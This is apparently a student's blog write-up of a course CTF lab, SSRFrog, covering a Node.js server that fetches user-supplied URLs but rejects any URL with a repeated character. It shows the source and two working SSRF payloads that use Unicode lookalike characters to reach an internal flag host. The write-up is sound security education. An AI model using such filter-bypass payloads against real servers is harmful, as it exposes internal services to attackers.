Simple Web 0x13(Lab - SSRFrog)

Posted on 2023-02-09 | Post modified | In Security/Course/NTUST WS/SSRF |

Simple Web 0x13(Lab - SSRFrog)

tags: `NTUSTWS` `CTF` `Web`

Challenge: http://h4ck3r.quest:8501/

Background

javascript Set() Web Hacking | 續章【EDU-CTF 2021】網站安全🔒 伺服器端請求偽造 SSRF 攻擊 — 「項莊舞劍，意在沛公」

Source code

:::spoiler source code

const express = require("express");
const http = require("http");

const app = express();

app.get("/source", (req, res) => {
    return res.sendFile(__filename);
})
app.get('/', (req, res) => {
    const { url } = req.query;
    if (!url || typeof url !== 'string') return res.sendFile(__dirname + "/index.html");

    // no duplicate characters in `url`
    if (url.length !== new Set(url).size) return res.sendFile(__dirname + "/frog.png");

    try {
        http.get(url, resp => {
            resp.setEncoding("utf-8");
            resp.statusCode === 200 ? resp.on('data', data => res.send(data)) : res.send(":(");
        }).on('error', () => res.send("WTF?"));
    } catch (error) {
        res.send("WTF?");
    }
});

app.listen(3000, '0.0.0.0');

:::

Simply speaking, it’ll call a Set() object that will filter duplicate characters
We also can find the hint in page source

Exploit

The hint said flag is on http://the.c0o0o0l-fl444g.server.internal:80, so we need to meet the first requirement - every single character is unique. We can use Domain Obfuscator to replace the similar characters.
Payload htTp:/\ⓉₕE．ℭ⓪ᴼ₀o０Ⅼ-Ⓕｌ₄4４ⓖ｡ₛⒺʳⓋₑⓇ.㏌ₜｅᴿ㎁ˡ htTp:/\ⓉｈE。Ⅽ⁰ₒ０O0ℓ-ｆᴸ④４⁴G．ＳＥRｖⅇⓡ.ⁱNｔₑrｎAℒ

Reference

SSRFrog Punycode converter

Post author: SBK6401
Post link: https://bernie6401.github.io/security/course/ntust%20ws/ssrf/2023/02/09/Simple-Web-0x13(Lab-SSRFrog)/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.